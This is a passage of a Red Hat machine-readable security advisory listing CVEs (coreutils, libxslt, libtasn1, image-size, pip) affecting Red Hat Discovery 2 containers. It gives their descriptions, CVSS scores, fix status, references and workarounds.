"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "libxml2: buffer over-read in xmlHTMLPrintFileContext in xmllint.c"
},
{
"acknowledgments": [
{
"names": [
"Mohamed Maatallah"
]
}
],
"cve": "CVE-2025-5278",
"cwe": {
"id": "CWE-121",
"name": "Stack-based Buffer Overflow"
},
"discovery_date": "2025-05-27T13:50:20.148000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2368764"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in GNU Coreutils. The sort utility\u0027s begfield() function is vulnerable to a heap buffer under-read. The program may access memory outside the allocated buffer if a user runs a crafted command using the traditional key format. A malicious input could lead to a crash or leak sensitive data.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "coreutils: Heap Buffer Under-Read in GNU Coreutils sort via Key Specification",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is considered Moderate rather than Critical because successful exploitation requires the use of the traditional key specification syntax with an exceptionally large character position value, which is uncommon in typical usage. Although the vulnerability can lead to a heap buffer overflow resulting in a read one byte before the allocated buffer, it does not enable code execution, privilege escalation, or direct compromise of data confidentiality or integrity. The impact is therefore primarily limited to potential service disruption due to application crashes.\n\nFurthermore, default RHEL configurations such as SELinux enforcement, ASLR, and memory protections reduce the likelihood of exploitation and limit the scope of any resulting impact. These safeguards, along with typical system usage patterns that do not commonly invoke the vulnerable code path, restrict exploitability in default and hardened environments. Consequently, the vulnerability\u2019s overall security impact is mitigated compared to flaws that allow immediate code execution or broader compromise across system components.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-5278"
},
{
"category": "external",
"summary": "RHBZ#2368764",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2368764"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-5278",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5278"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-5278",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5278"
},
{
"category": "external",
"summary": "https://cgit.git.savannah.gnu.org/cgit/coreutils.git/commit/?id=8c9602e3a145e9596dc1a63c6ed67865814b6633",
"url": "https://cgit.git.savannah.gnu.org/cgit/coreutils.git/commit/?id=8c9602e3a145e9596dc1a63c6ed67865814b6633"
},
{
"category": "external",
"summary": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=78507",
"url": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=78507"
}
],
"release_date": "2025-05-27T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-29T22:05:31+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "coreutils: Heap Buffer Under-Read in GNU Coreutils sort via Key Specification"
},
{
"cve": "CVE-2025-10911",
"cwe": {
"id": "CWE-825",
"name": "Expired Pointer Dereference"
},
"discovery_date": "2025-09-24T12:46:50.095000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2397838"
}
],
"notes": [
{
"category": "description",
"text": "A use-after-free vulnerability was found in libxslt while parsing xsl nodes that may lead to the dereference of expired pointers and application crash.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libxslt: use-after-free with key data stored cross-RVT",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-10911"
},
{
"category": "external",
"summary": "RHBZ#2397838",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2397838"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-10911",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-10911"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-10911",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10911"
},
{
"category": "external",
"summary": "https://gitlab.gnome.org/GNOME/libxslt/-/issues/144",
"url": "https://gitlab.gnome.org/GNOME/libxslt/-/issues/144"
},
{
"category": "external",
"summary": "https://gitlab.gnome.org/GNOME/libxslt/-/merge_requests/77",
"url": "https://gitlab.gnome.org/GNOME/libxslt/-/merge_requests/77"
}
],
"release_date": "2025-08-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-29T22:05:31+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libxslt: use-after-free with key data stored cross-RVT"
},
{
"cve": "CVE-2025-13151",
"cwe": {
"id": "CWE-120",
"name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
},
"discovery_date": "2026-01-07T22:01:02.206250+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2427698"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libtasn1. A remote attacker could exploit a stack-based buffer overflow vulnerability in the `asn1_expend_octet_string` function. This occurs due to a failure in validating the size of input data. Successful exploitation can lead to a Denial of Service (DoS) condition, making the affected system or application unavailable.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libtasn1: libtasn1: Denial of Service via stack-based buffer overflow in asn1_expend_octet_string",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Low for Red Hat products. A stack-based buffer overflow in the `libtasn1` library, specifically within the `asn1_expend_octet_string` function, can be triggered by failing to validate input data size. This could allow a remote, unauthenticated attacker to cause a denial of service in applications utilizing `libtasn1`.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-13151"
},
{
"category": "external",
"summary": "RHBZ#2427698",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427698"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-13151",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13151"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-13151",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13151"
},
{
"category": "external",
"summary": "https://gitlab.com/gnutls/libtasn1",
"url": "https://gitlab.com/gnutls/libtasn1"
},
{
"category": "external",
"summary": "https://gitlab.com/gnutls/libtasn1/-/merge_requests/121",
"url": "https://gitlab.com/gnutls/libtasn1/-/merge_requests/121"
}
],
"release_date": "2026-01-07T21:14:05.223000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-29T22:05:31+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "libtasn1: libtasn1: Denial of Service via stack-based buffer overflow in asn1_expend_octet_string"
},
{
"cve": "CVE-2025-71319",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-06-09T21:01:11.339286+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2487296"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in image-size. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by supplying specially crafted JXL, HEIF, or JP2 image files that contain zero-sized boxes. The `findBox` function, responsible for image validation, enters an infinite loop when processing these malicious files, leading to an application hang. This can disrupt the availability of services relying on the image-size component.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "image-size: image-size: Denial of Service due to infinite loop when processing specially crafted images.",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in the `image-size` component, which can be triggered remotely by processing specially crafted JXL, HEIF, or JP2 image files containing zero-sized boxes. This flaw can lead to an application hang due to an infinite loop in the `findBox` function, impacting the availability of services that rely on this image processing library within Red Hat products.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-71319"
},
{
"category": "external",
"summary": "RHBZ#2487296",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487296"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-71319",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71319"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-71319",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71319"
},
{
"category": "external",
"summary": "https://github.com/image-size/image-size/security/advisories/GHSA-m5qc-5hw7-8vg7",
"url": "https://github.com/image-size/image-size/security/advisories/GHSA-m5qc-5hw7-8vg7"
},
{
"category": "external",
"summary": "https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-findbox-function",
"url": "https://www.vulncheck.com/advisories/image-size-denial-of-service-via-infinite-loop-in-findbox-function"
}
],
"release_date": "2026-06-09T19:57:16.125000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-29T22:05:31+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "image-size: image-size: Denial of Service due to infinite loop when processing specially crafted images."
},
{
"acknowledgments": [
{
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2026-8643",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-04-22T23:09:35+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2460927"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in pip, the package installer for Python. A remote attacker can exploit this vulnerability by tricking a victim into installing a malicious Python wheel. This wheel contains specially crafted entry-point names that use directory traversal or absolute paths. This allows pip to write generated script wrappers outside the intended installation directory, leading to arbitrary file overwrite. This can severely impact system integrity and availability, and in certain scenarios, may lead to arbitrary code execution.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pip: Path traversal via malicious entry point name in pip wheel installation allows arbitrary file overwrite",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in pip\u0027s wheel installation process allows for arbitrary file overwrite due to path traversal. An attacker could exploit this by convincing a user to install a specially crafted malicious Python wheel. While file overwrites are limited to the installing user\u0027s permissions, using `pip install` with elevated privileges in Red Hat environments significantly increases the potential impact, potentially leading to system integrity compromise or arbitrary code execution.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-8643"
},
{
"category": "external",
"summary": "RHBZ#2460927",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460927"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-8643",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-8643"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-8643",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8643"
},
{
"category": "external",
"summary": "https://github.com/pypa/pip/commit/8eb178480bd1a2b223f509fc430796b265158dfb",
"url": "https://github.com/pypa/pip/commit/8eb178480bd1a2b223f509fc430796b265158dfb"
}
],
"release_date": "2026-05-27T17:03:36.585000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-29T22:05:31+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
},
{
"category": "workaround",
"details": "To mitigate this issue, users should avoid installing Python wheels from untrusted sources. It is strongly advised against using `pip install` with elevated privileges, such as `sudo`, when installing wheels. Additionally, administrators should inspect `entry_points.txt` within wheels for path separators or absolute paths before installation.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
